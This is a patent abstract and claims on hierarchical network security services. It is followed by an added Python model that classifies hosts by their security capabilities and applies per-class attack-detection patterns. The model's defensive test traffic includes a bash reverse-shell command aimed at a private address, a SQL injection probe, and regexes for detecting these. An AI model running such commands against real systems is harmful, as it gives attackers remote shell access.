Hierarchical application of security services within a computer network
Abstract
In general, techniques are described for hierarchical application of security services with a network device. In particular, the network device receives security classification information that maps a security class to one or more computing devices; the security class identifies the security capabilities of those computing devices. The network device also receives network traffic associated with the computing devices and applies to it a set of patterns, defined by a policy associated with the security class, to detect a corresponding set of network attacks. Based on the application of the set of patterns, the network device forwards the network traffic. Because it has received the security classification information, the network device is aware of the security capabilities the computing devices already provide and applies only those patterns needed to augment them, so that security services are applied hierarchically across the network rather than redundantly at each layer.
41 Claims
1. A method comprising:
- receiving, with a network device, security classification information sent to the network device from a second network device, wherein the security classification information identifies at least one mapping between a security class and at least one computing device, wherein the security class identifies security capabilities of the at least one computing device;
- after receiving the security classification information from the second network device, receiving, with the network device, network traffic associated with the at least one computing device;
- applying, with the network device, a set of patterns defined by a policy associated with the security class to the network traffic to detect any of a corresponding set of network attacks; and
- forwarding, with the network device, the network traffic based on the application of the set of patterns.
(Dependent claims 2 through 14.)

15. A network device comprising:
- at least one network interface card to receive security classification information sent to the network device from a second network device, the security classification information mapping a security class to at least one computing device within the network, and the security class identifying security capabilities of the at least one computing device, wherein the at least one network interface card, after receiving the security classification information from the second network device, receives network traffic; and
- a control unit comprising a processor coupled to the network interface card, wherein the control unit further comprises a storage medium that stores the security classification information and a policy associated with the security class, and wherein the processor applies a set of patterns defined by the policy to the network traffic to detect any of a set of network attacks and forwards the network traffic based on the application of the set of patterns.
(Dependent claims 16 through 24.)

25. A network system comprising:
- a set of computing devices;
- an access device coupled to the set of computing devices;
- a network device coupled to the access device, wherein the network device includes:
  - at least one network interface card to receive security classification information sent to the network device from a second network device, the security classification information mapping a security class to at least one computing device within the network, and the security class identifying security capabilities of the at least one computing device, wherein the at least one network interface card, after receiving the security classification information from the second network device, receives network traffic; and
  - a control unit coupled to the network interface, wherein the control unit comprises a storage medium storing the security classification information mapping and a policy associated with the security class, and wherein the control unit applies a set of patterns defined by the policy to the network traffic to detect any of a set of network attacks and forwards the network traffic based on the application of the set of patterns.
(Dependent claims 26 through 38.)

39. A non-transitory computer-readable storage medium comprising instructions for causing a programmable processor to:
- receive, with a network device, security classification information sent to the network device from a second network device, wherein the security classification information identifies at least one mapping between a security class and at least one computing device, wherein the security class identifies security capabilities of the at least one computing device;
- after receiving the security classification information from the second network device, receive, with the network device, network traffic associated with the at least one computing device;
- apply, with the network device, a set of patterns defined by a policy associated with the security class to the network traffic to detect a corresponding set of network attacks; and
- forward, with the network device, the network traffic based on the application of the set of patterns.

40. A method comprising:
- receiving, with one or more layer two (L2) network access devices, access requests from a plurality of computing devices;
- in response to the access requests, collecting security information from each of the plurality of computing devices by way of at least one communication directed to the network security device, wherein the security information identifies security capabilities of each of the plurality of computing devices;
- assigning a first set of the plurality of computing devices to a first security class and assigning a second set of the plurality of computing devices to a second security class based on the security capabilities of each of the computing devices;
- receiving, with a layer three (L3) network device, network traffic associated with the plurality of computing devices;
- applying, with the L3 network device, a first set of attack detection patterns only to a first portion of the network traffic associated with the first set of the computing devices to detect a corresponding first set of network attacks, wherein the first set of patterns is defined by a policy associated with the first security class;
- applying, with the L3 network device, a second set of attack detection patterns only to a second portion of the network traffic associated with the second set of the computing devices to detect a corresponding second set of network attacks, wherein the second set of patterns is defined by a policy associated with the second security class and differs from the first set of patterns by at least one pattern; and
- forwarding, with the L3 network device, the network traffic based on the application of the first set of patterns and the second set of patterns.
(Dependent claim 41.)

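The abstract and claim 40 describe a two-stage mechanism: an L2 access device learns each host's security capabilities and groups hosts into security classes, and an L3 device applies to each host's traffic only the patterns its class's policy still needs. The following Python model is an added example written for this page; it is not code from the patent or its assignee. Everything in it is constructed: the host addresses, the capability names ("waf", "host-ips"), the four regex patterns and the sample payloads. In particular, the way a policy is derived here (each pattern is tagged with the endpoint capability that would make it redundant, and a class's policy is the set of untagged or uncovered patterns) is one plausible reading of "only apply those patterns required to augment these detected security capabilities", not something the claims specify.

```python
"""Added example (not from the patent): a model of the hierarchical
security-service scheme in the abstract and claim 40.  Hosts, capabilities,
patterns and payloads are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class AttackPattern:
    name: str
    regex: re.Pattern            # applied to the packet payload
    covered_by: Optional[str]    # endpoint capability that already detects this, if any


# Constructed catalogue: the full pattern set the L3 device is able to apply.
CATALOGUE: Tuple[AttackPattern, ...] = (
    AttackPattern("sqli-union-select", re.compile(rb"union\s+select", re.I), "waf"),
    AttackPattern("sqli-comment-tail", re.compile(rb"'\s*(?:--|#)"), "waf"),
    AttackPattern("bash-reverse-shell",
                  re.compile(rb"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"), "host-ips"),
    # No endpoint capability covers this one, so every class keeps it.
    AttackPattern("dns-long-label", re.compile(rb"[A-Za-z0-9+/=]{48,}\.[a-z0-9.-]+"), None),
)

# Constructed security information gathered by the L2 access device at access
# time: host address -> capabilities the host reported.
HOST_CAPABILITIES: Dict[str, FrozenSet[str]] = {
    "10.0.0.11": frozenset({"waf", "host-ips"}),
    "10.0.0.12": frozenset({"waf"}),
    "10.0.0.13": frozenset(),
}


def assign_classes(host_caps: Dict[str, FrozenSet[str]]):
    """L2 access device step: hosts with the same capability set share a class.
    Returns the classification information: class -> capabilities and
    class -> member hosts."""
    class_caps: Dict[str, FrozenSet[str]] = {}
    members: Dict[str, set] = {}
    for host, caps in host_caps.items():
        cls = "class-" + ("+".join(sorted(caps)) or "none")
        class_caps[cls] = caps
        members.setdefault(cls, set()).add(host)
    return class_caps, {cls: frozenset(h) for cls, h in members.items()}


class L3Device:
    """The L3 network device of claim 40: applies a per-class pattern subset."""

    def __init__(self, catalogue: Tuple[AttackPattern, ...]) -> None:
        self.catalogue = catalogue
        self.host_to_class: Dict[str, str] = {}
        self.policies: Dict[str, Tuple[AttackPattern, ...]] = {}

    def receive_classification(self, class_caps, members) -> None:
        """Store the mapping and derive each class's policy: the patterns whose
        covering capability the class does not provide."""
        for cls, caps in class_caps.items():
            self.policies[cls] = tuple(p for p in self.catalogue if p.covered_by not in caps)
            for host in members.get(cls, ()):
                self.host_to_class[host] = cls

    def process(self, src: str, payload: bytes) -> Tuple[str, List[str], Optional[str]]:
        """Apply the source's class patterns to one packet; drop on any hit.
        An unclassified host gets the full catalogue (fail toward more
        inspection, not less)."""
        cls = self.host_to_class.get(src)
        patterns = self.policies[cls] if cls in self.policies else self.catalogue
        hits = [p.name for p in patterns if p.regex.search(payload)]
        return ("drop" if hits else "forward"), hits, cls


def build_device() -> L3Device:
    """Wire the two devices together as claim 40 describes."""
    class_caps, members = assign_classes(HOST_CAPABILITIES)
    dev = L3Device(CATALOGUE)
    dev.receive_classification(class_caps, members)
    return dev


# Constructed traffic: (source host, payload).
SAMPLE_TRAFFIC = [
    ("10.0.0.12", b"GET /?id=1 UNION SELECT 1,2 HTTP/1.1"),    # WAF-protected host
    ("10.0.0.13", b"GET /?id=1 UNION SELECT 1,2 HTTP/1.1"),    # unprotected host
    ("10.0.0.99", b"bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"),  # never classified
]

if __name__ == "__main__":
    dev = build_device()
    for cls, pats in sorted(dev.policies.items()):
        print(f"{cls}: {[p.name for p in pats]}")
    for src, payload in SAMPLE_TRAFFIC:
        action, hits, cls = dev.process(src, payload)
        print(f"{src} ({cls}): {action} {hits}")
```

Running it shows the hierarchy the abstract describes: the SQL injection probe from the WAF-protected host is forwarded untouched by the L3 device (the two "waf" patterns are absent from that class's policy), the same probe from the unprotected host is dropped, and the two class policies differ by at least one pattern as claim 40 requires. The design trade-off to keep in view is that the L3 device relaxes its own inspection on the strength of classification information received from another device, which in turn rests on what each host reported about itself; that channel and those reports need to be trustworthy before a pattern is dropped from a policy, and the model's fallback for a host it has never been told about is to apply everything.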
Specification